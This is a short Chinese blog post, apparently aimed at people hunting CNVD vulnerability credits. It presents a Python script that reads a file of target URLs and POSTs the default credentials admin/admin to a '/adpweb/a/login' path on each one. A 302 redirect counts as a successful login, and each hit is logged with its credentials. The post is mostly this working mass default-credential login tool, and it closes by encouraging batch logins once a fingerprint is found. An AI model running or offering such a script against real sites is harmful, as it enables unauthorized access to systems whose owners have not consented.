文章目录
- 前言
- 一、发现过程
- 二、使用步骤
- 1.引入库
- 2.读入数据
- 结果
- 总结
前言
想刷cnvd?最重要的是登录进行测试功能点
一、发现过程
找到一个网站
发现登录失败返回200
登录成功则是重定向 302
那就写一个脚本吧
二、使用步骤
1.引入库
import requests
2.读入数据
import requests# 读取 URL 文件
with open('urls.txt', 'r') as file:urls = file.readlines()# 请求头
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
}# 请求数据
data = {"username": "admin","password": "admin"
}# 对每个 URL 发送 POST 请求
for url in urls:url = url.strip()if not url.startswith("http://") and not url.startswith("https://"):url = f"http://{url}"url = f"{url.rstrip('/')}/adpweb/a/login"try:response = requests.post(url, headers=headers, data=data, allow_redirects=False)print(f"请求 URL: {url}")print("状态代码:", response.status_code)redirect_location = response.headers.get('Location')print("重定向地址:", redirect_location)print("=" * 50)# 如果有重定向,记录相关信息if redirect_location:with open('redirect_log.txt', 'a') as log_file:log_file.write(f"URL: {url}\n")log_file.write(f"Username: {data['username']}\n")log_file.write(f"Password: {data['password']}\n")log_file.write(f"Redirect Location: {redirect_location}\n")log_file.write("=" * 50 + "\n")except requests.exceptions.RequestException as e:print(f"请求 URL {url} 失败: {e}")print("=" * 50)结果
总结
只要找到特征就可以批量进行登录,poc很简单的,六花祝你天天开心
